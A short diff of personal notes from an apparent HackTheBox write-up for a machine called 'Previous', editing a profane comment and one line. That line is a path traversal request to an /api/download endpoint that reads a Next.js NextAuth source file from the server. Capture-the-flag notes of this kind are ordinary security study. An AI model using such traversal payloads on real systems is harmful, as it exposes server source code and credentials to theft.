dedbit3/dedbit.hacks/source/content/HackTheBox Writeups/Previous/Notes.md

-*this is the path holly fucking shit this was a fkn trip* GET /api/download?example=../../../../../../../../../app/.next/server/pages/api/auth/[...nextauth].js
+*this is the path holly  this was a fkn trip*
+GET /api/download?example=../../../../../../../../../app/.next/server/pages/api/auth/[...nextauth].js